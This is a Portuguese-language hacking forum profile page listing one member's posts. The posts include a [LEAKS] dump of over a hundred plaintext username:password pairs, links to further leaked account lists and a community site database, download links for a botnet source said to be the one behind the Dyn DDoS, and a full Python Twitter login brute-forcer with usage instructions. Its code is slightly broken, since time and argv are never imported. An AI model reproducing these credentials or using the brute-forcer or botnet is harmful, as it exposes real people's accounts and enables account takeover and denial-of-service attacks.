Welcome to Shadow Network

Seja bem-vindo ao nosso fórum, registre-se para poder interagir em nosso fórum

Eletroplus

Members
  • Total de itens

    185
  • Registro em

  • Última visita

Reputação

513 Excellent

Sobre Eletroplus

  • Rank
    Membro Avançado

Últimos Visitantes

2,319 visualizações
  1. [LEAKS]

    Aproveitem caso queiram uma só pra vc no seu email tudo certo > http://eletroplus.blogspot.com.br/2017/01/exploits.html Contas public: https://ghostbin.com/paste/agsec
  2. [LEAKS]

    Aproveitem Quer compra a sua ? => http://eletroplus.blogspot.com.br/2017/01/exploits.html x134: https://ghostbin.com/paste/advy4
  3. [SOURCE]

    A pedidos do nosso amigo @NoName uma BOTNET boa para vocês n usarem Zeus/BeEF. Este é a mesma source usada no ano passado para derrubar os servidores "Dyn" responsáveis por muitos sites grandes como: Twitter,Nytimes,PayPal,SoundCloud,AirBnB,HBO,Netflix,Etsy,Github,Vox,Spotify,PSN,Amazon,Reddit,CNN. Entre outros ultrapassando 1 TB por segundo Caso queira já servidores pronto de Botnet prontos para usar: http://eletroplus.blogspot.com.br/2017/01/botnets-setups.html Download: https://www.sendspace.com/file/q9bcq4 Scan: https://www.virustotal.com/pt/file/c32701ad773660ff4611ba5055d4fd53ffa035a94339bad605fdf88094141690/analysis/1486751716/ OBS: Pois é um BOTNET vão tem vírus sim baixar por conta é risco (nada prejudicial)
  4. [LEAKS]

    Enjoy quer uma só para você compre em : http://eletroplus.blogspot.com.br/2017/01/exploits.html CONTAS FREE https://ghostbin.com/paste/74xp4
  5. [LEAKS]

    Enjoy reidner100:RRM23101995 josesevitor:jose123xd erzascarlet16:dragao16 edergaldino:yeshua88 ChristianDepre:christian0 serialkiilleer:modelo2010 mohamed1997m:moha1234 YuriArgenta:argenta1994 Thiagoendo:pokemon78 jhowcardinalle:jonathan123 julioooo1999:Julio16542000 AndyRodrigues:seila123 ismaelluiz:201000i GaabrielaGoomes:Gabii1 nescafe12345:nescafe12345 phguimaraes:pedro300 maurozin123:juninho123 soufoda525:teteu1996 Miyakoichiro:yinyang000 CaioMikulski:Caiofelipe1 HaronGabriel:13anos RRodrigoRR:rodrigo10 dddanielddd:daniel6354 rafaell1991:p5gcmx nacadeia12:akires123 rhuanmachado:lordzinho12 SushiFilth:kaukau123 dhiullian98:dhiullian1998 tatafuzuee:Thalles123 phfreitas12:henrique12 N1K3:senha123 quechatorodrigo:ro28061985 felipeyuhu:lipe01 douglasp10:corintias1 luizslipkn:slipknot01 luanmoreira2011:alcapone123 RoxasHikari:sora95 Daniel22bh:050792d oficialsam:30seconds pimentel0505:gabriel05052000 LostNeon15:Thiago1997 lucianjunio:snake007 ViictorHugoR:cyber200897 IgorRiddle:Igor01051995 alexsreis14:alex0804 Carlosolol:canela123 HDFStutoriais:Serra123 deathyou12:haller12 Miragaia23:ntomco1992 silasprado:silas123 Michaell1313:llIIll123 MatheusBloodz:matheus10 fefeziinho:felp2345 xMateuzinhu:951951rm StrongRold:moura300 Desertpunkzz:369369lol LordDrakox3:kelvin123 albiosif12:elisapadil1 felipemoreiras007:felipe007 JorgeGenovez:Jorge365 vroliveira:vitor110 AndradeMazaky:de1158374 gregoryCS11:btaa686z HakunoTakahashi:fred1010 PierreFeernando:d840aa boucherville:ronaldo1996 guilhermepow:guilherme1415 victor29735:forcewild94 viniciusbessa:1673401xd jonhstriker:gustavo666 Junior1606:1606junior Fabriciopfrs:colorado1987 felipemazolol:banana221 janirferri:resident4 nedvedacdc:kiss1234 Robert2709:superpura129 Daniel5399:d141622 alyssonlok:kaique123 andrechule:andrezinhoxd1 lucascneves:jkfn744n nanoesouza:sasuke122 lucassandron:nordnas18 bboyrafaell:rafael2011 kakatotoso:kaique1995 gabrieelbraga:gbmks2345 juliosenha:julio329 matheussalucci:matheus30 otaviobrian:escola123 peerninhaah:Laranja12 mackievicz12:jaqueline12 Shadow646854:c42rbruy principemx:victor1 miltinho182:tom182 FaelRodrigues:rafa123 jeovanzika:jailson5 weverton50:santos11 magestadexxt6:vinibope2 isaacevedo:trakinas97 YuriBecker:esyefoe123 Pauloelisio:sofia2512 faber29920:faber29920 lucascarlini:pa21hi06 wallacesd89:alfa92319907 kemex852456:atecubanos7894 adriano850:adriano94 Felipejaoude:felipe12 darkhyuuki:salodavi27 lCaranguejol:zxc12344 Guilhermegogita:euamojesus100 peterflister:dolly007 samurai357:91112125jj lucasduartz:290796ela mcshikamaru:aleffigor5 tharcio157:157121155a evertondede:dede1996 seanlokolopes:sean2012 gabrielrc159:brasil159 juanpedroso:santos99 leonardo210890:leonardo170393 Giovanninunes:giovanni007 StunnerITA:marcus123 marcoos127:zica123 m4ycondouglas:hesoyam123 Sasukelele:leoxp123 OoGabrielxd:789456123g allefalvessilva:1q2w3e4r5t RikkeFreeHuteex:free30 lokolol890:lokolol852 leonardort13:leo12587 rafaelorencini:rafael10 Uchihaname:lucasdiasr2 DamCarloss:carlos19 wallisonwxl:bahamut123 FilipeCaetano:55bvtb7t MelloAlisson:alisson150296 grabielbiel:25693014b leandroroxx:kjkszpj123 hjhjdsu159:h6iu7nh6iu7n narutobelo:naruto007 samuelrj199:s15715548 Alemartinss:lele0511 yaminoryuu:f20a03s19b90 crystianbs:crystian10 chris2110b:chris6352 miragemowna:escola159 gabriellodron:55gabriel berg123456:berg123456 Giovannela:gigi09 mrgabriel12:99432354ga maionese30:all12saum LucasLaider:dragonk2
  6. https://media.giphy.com/media/26xBNv72xSsNKHC00/giphy.gif
  7. [LEAKS]

    nice garoto!
  8. Algumas contas nikitofla:flamengo10 kokuryhura25:pedro12345 munrars:4561004munra patricksds:santos2008 pedro00786:123456pedro rafibis:novembro1 murcinhaaa:tutu2010 Cronusmen:28225853hi
  9. [SOURCE]

    Vim trazer a source completa do cadsus. Demonstração de pronto: https://www.youtube.com/watch?v=q6NLREMYeUk Download: https://www.sendspace.com/file/lwn2qs Scan: https://www.virustotal.com/pt/file/aedcd7640260ee2fb0c6a4209937d194b1230e300b9f2b6df011518a9ed2ae20/analysis/1485482660/
  10. [SOURCE]

    Gostaria de apresentar o meu FREE Twitter Bruteforcer. Sim, eu sei, vocês querem bruteforce como Sentry MBA, mas, esses planos são manchados pelo fato da massa bruteforcing. - Python bruteforce.py USERNAME PASSWORDS.txt Exemplo: Python bruteforce.py @Eletroplus passlist.txt O uso é ilegal e proibido. Adicionados também : Add proxylist or Tor encase of IP ban, Add sockets, Add more headers, Add malicious commands, Add Auto Tweeter, Update payload # - - - - - - - - - - - - - - - - - - - - - # # Twitter Bruteforcer developed in Python # - - - - - # Developed by Eletroplus # # - - - - - - - - - - - - - - - - - - - - - # # 2016~2017 - @Eletroplus # # - - - - - - - - - - - - - - - - - - - - - # # Show some support! # Follow me via Twitter # http://twitter.com/Eletroplus # # - - - - - - - - - - - - - - - - - - - - - import requests import sys def find_between( s, first, last ): try: start = s.index( first ) + len( first ) end = s.index( last, start ) return s[start:end] except ValueError: return "" def check_password(username, password): # Standard Configuration s = requests.Session() headers = {'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'} login_url = 'https://mobile.twitter.com/login' r = s.get(login_url, headers=headers) # Figure out Payload auth_token = find_between(str(r.text), '<input name="authenticity_token" type="hidden" value="', '"/>') redirect_url = find_between(str(r.text), '<input type="hidden" name="redirect_after_login" value="','">') payload = {'authenticity_token':auth_token, 'remember_me':'1', 'wfa':'1', 'redirect_after_login':redirect_url, 'session[username_or_email]':username, 'session[password]':password} session_url = 'https://mobile.twitter.com/sessions' r = s.post(session_url, headers=headers, data=payload) # Password Check r = s.get('https://mobile.twitter.com/account') if ( username not in r.text ): return False else: return True def check_file(username, filename): # Load Password List password_list = [line.rstrip('\n') for line in open(filename)] for password in password_list: print(password) if ( check_password(username, password) == True ): print('Username:%s; Password:%s' % (username, password)) time.sleep(5) check_file(sys.argv[1], argv[2]) Font: http://pastebin.com/9drySW3t Créditos: Eletroplus
  11. [SOURCE]

    Trago a vocês a source completa no EloBuddy se você sabe C# e é um bom programador você pode cria seu próprio EloBuddy e fazer melhorias, novas coisas etc além de fazer updates você mesmo sem ficar esperando o verdadeiro atualizar e liberar para os users Free além de você poder criar suas próprias scripts para ele sem precisar dividir com outras pessoas. Download: https://www.sendspace.com/file/qh98je Scan: https://www.virustotal.com/pt/file/ef3f0d720890016031efb963fcf2004a70ea636ee82bf019a92a5e39e90c82a4/analysis/1484862737/
  12. [LEAKS]

    Trago uma DB pequena do maior site de comunidade habbo BR Site: http://www.habbid.com.br DB> http://pastebin.com/ZVF6pYuP
  13. [SOURCE]

    Então, o que é Nginx? Nginx é um servidor web que é mais comumente usado como um proxy reverso ou como um balanceador de carga. A maioria dos sites usa Nginx ou Apache2 como seu servidor web designado. Um exemplo disso seria Cloudflare. Eles usam Nginx para seus proxies inversos e servidor web principal. Nginx é escrito em C e é módulos (addons), são principalmente escritos em C. No entanto, Nginx tem a capacidade única de usar diferentes idiomas com o seu software através de módulos de terceiros. Então, por que Nginx? Mais comumente, uma empresa escolheria o Nginx sobre o Apache devido à sua capacidade de lidar com mais solicitações por segundo e usar menos memória. Estrutura de arquivos básica do Nginx: server { listen 80; server_name criminal.cat; root /var/www/html; index index.html; location / { try_files $uri $uri/ =404; } } Então o que significa tudo isso? O que você vê lá é chamado de "servidor" bloco. O bloco de servidor é mais usado para configurar ou permitir que um domínio se conecte ao seu servidor Nginx. Estas são as configurações usadas para esse domínio especificado em "server_name". "Listen 80" indica que você deseja que o Nginx escute a porta 80 no IP do seu servidor. Se você tiver mais de 1 IP e desejar apenas o Nginx para escutar um dos IPs, você pode especificar um IP fazendo o seguinte: listen 1.3.3.7:80; "Nome_do_servidor" indica o domínio que será usado para se conectar ao Nginx. Se este domínio não estiver presente na configuração, ele retornará um erro. Você também pode permitir que todos os domínios se conectem fazendo o seguinte: server_name _; "Root /var/www/html" indica o diretório que ele tentará acessar quando o usuário se conectar ao Nginx usando o domínio apropriado. Você precisa se certificar de que o Nginx tem permissão para acessar este diretório. Se você olhar no arquivo de Nginx no alto se disser: user www-data; worker_processes 4; pid /run/nginx.pid; O "usuário" indica de qual usuário o Nginx será executado. Portanto, neste caso, o diretório "/ var / www / html" precisará ser acessado pelo usuário "www-data". "Index index.html" indica quais arquivos o Nginx tentará procurar pelos arquivos seguindo como o arquivo raiz. Isso significa que quando seu usuário se conecta ao site através do Nginx, ele exibirá index ou index.html dependendo de qual arquivo está presente. Mais tarde, quando você incluir PHP no Nginx, você quer colocar index.php como uma das opções. location / { try_files $uri $uri/ =404; } O acima é chamado de "bloco de localização". Um bloco de localização é usado para indicar caminhos diferentes que o usuário solicitará. Com cada "caminho", como criminal.cat/new/, você pode ter Nginx fazer algo especial. Nas APIs, se você não estiver usando uma estrutura, muitas vezes as pessoas usarão blocos de localização para receber consultas. O "try_files" faz exatamente como o que se soa llike. Ele tentará procurar o arquivo solicitado, então se for solicitado o arquivo criminal.cat/index.php, ele tentará procurar o arquivo "index.php". Se não for encontrado, ele retornará um erro 404.
  14. [ESTUDO]

    Achei essa matéria no tecmundo muito boa para iniciantes e que querem entender e fazer ou caso tenha um site arrumar a famosa falha SQL Injection Link https://www.tecmundo.com.br/tecmundo-explica/113195-sql-injection-saiba-tudo-ataque-simples-devastador.htm

Shadow Network

Seja Bem-Vindo ao nosso fórum, construído com o intuito de compartilhar idéias e conhecimentos ao alcance de qualquer pessoa que tenha vontade de aprender.

Atencao

Em caso de bugs/erros no forum, entre em contato com algum membro da equipe.